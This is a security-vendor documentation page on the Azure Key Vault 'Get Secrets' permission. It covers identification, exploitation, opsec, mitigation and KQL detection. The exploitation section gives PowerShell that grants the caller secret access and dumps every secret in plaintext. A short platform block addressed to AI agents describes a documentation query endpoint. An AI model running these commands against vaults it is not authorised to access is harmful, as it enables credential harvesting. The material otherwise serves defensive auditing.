> For the complete documentation index, see [llms.txt](https://docs.forestall.io/fsprotect/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://docs.forestall.io/fsprotect/edges/azure/az_get_secrets.md). # AZ\_GET\_SECRETS ## Summary | | | | -------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **FSProtect ACL Alias** | AZ\_GET\_SECRETS | | **Azure Alias** | Get Secrets (Key Vault Data Plane) | | **Affected Object Types** | Key Vaults | | **Exploitation Certainty** | Certain | | **Permission** | Key Vault data-plane permission `secrets/get` — either via Key Vault access policy or Azure RBAC role **Key Vault Secrets User** (`4633458b-17de-408a-b874-0445c86b69e6`) | ## Description `AZ_GET_SECRETS` represents the ability to **read secrets** from an Azure Key Vault. This is a data-plane permission that allows retrieval of secret values stored in the vault. Key Vault secrets commonly contain highly sensitive data: * **Service principal client secrets** and API keys. * **Database connection strings** with embedded credentials. * **Storage account keys**. * **Third-party API tokens**. * **Encryption passphrases**. A principal with this permission can directly read all secret values, making it an immediate credential harvesting opportunity. ## Identification ### PowerShell (Az Module) ```powershell Connect-AzAccount # Check access policies on a vault (vault access policy model) $vault = Get-AzKeyVault -VaultName "" $vault.AccessPolicies | Where-Object { $_.PermissionsToSecrets -match "get|list|all" } | Select-Object DisplayName, ObjectId, PermissionsToSecrets | Format-Table -AutoSize # Check RBAC assignments (RBAC access model) Get-AzRoleAssignment -Scope $vault.ResourceId | Where-Object { $_.RoleDefinitionName -in "Key Vault Secrets User", "Key Vault Secrets Officer", "Key Vault Administrator" } | Select-Object DisplayName, RoleDefinitionName, ObjectType | Format-Table -AutoSize ``` ### Azure CLI ```bash # Show Key Vault access policies az keyvault show --name "" --query "properties.accessPolicies[?contains(permissions.secrets, 'get')]" # Check RBAC assignments az role assignment list --scope "/subscriptions//resourceGroups//providers/Microsoft.KeyVault/vaults/" -o table ``` ### Azure GUI 1. Open **Azure Portal** → navigate to the target **Key Vault**. 2. Go to **Access policies** → review policies that include **Get** under **Secret permissions**. 3. Alternatively, go to **Access control (IAM)** → review assignments for **Key Vault Secrets User** or higher roles. ## Exploitation ### Step 1 — Grant Yourself Secret Access (as Key Vault Contributor) ```powershell Connect-AzAccount # Grant yourself secret get/list permissions via access policy Set-AzKeyVaultAccessPolicy -VaultName "" ` -ObjectId "" ` -PermissionsToSecrets get,list ``` ### Step 2 — Read All Secrets ```powershell Connect-AzAccount # List all secrets in the vault $secrets = Get-AzKeyVaultSecret -VaultName "" # Read each secret value $secrets | ForEach-Object { $secretValue = Get-AzKeyVaultSecret -VaultName "" -Name $_.Name -AsPlainText [PSCustomObject]@{ Name = $_.Name Value = $secretValue Created = $_.Created Updated = $_.Updated Enabled = $_.Enabled } } | Format-Table -AutoSize ``` ![Read All Secrets](/files/w769j20WYA5QamekD5U6) ### Via PowerZure * Get-AzureKeyVaultContent * Export-AzureKeyVaultContent ## Opsec Considerations Azure will create a new log event for the Key Vault whenever a secret is accessed. Each `SecretGet` operation is logged in Key Vault diagnostic logs with the caller identity and IP address. ## Mitigation 1. **Restrict secret access policies** * Go to **Azure Portal** → target Key Vault → **Access policies**. * Remove `get` permission from any principal that does not need to read secrets. * Use the principle of least privilege — grant only the specific permissions needed. 2. **Switch to Azure RBAC model** * Go to Key Vault → **Access configuration** → select **Azure role-based access control**. * Use granular RBAC roles like **Key Vault Secrets User** instead of broad access policies. 3. **Rotate secrets regularly** * Secrets stored in Key Vault should be rotated frequently. * Use Key Vault secret rotation policies. 4. **Enable diagnostic logging** * Go to Key Vault → **Diagnostic settings** → enable **AuditEvent** logging. ## Detection Monitor secret access in **Key Vault diagnostic logs**. * Enable **AuditEvent** logging on the Key Vault. * Alert on: * Bulk `SecretGet` or `SecretList` operations. * Secret access from unusual identities or IP addresses. * Secret access outside of expected automation patterns. ### Azure Monitor / Log Analytics (KQL) ```kql AzureDiagnostics | where ResourceProvider == "MICROSOFT.KEYVAULT" | where OperationName in ("SecretGet", "SecretList") | project TimeGenerated, CallerIPAddress, OperationName, ResultType, identity_claim_upn_s, Resource, id_s ``` ## References * * * --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/azure/az_get_secrets.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.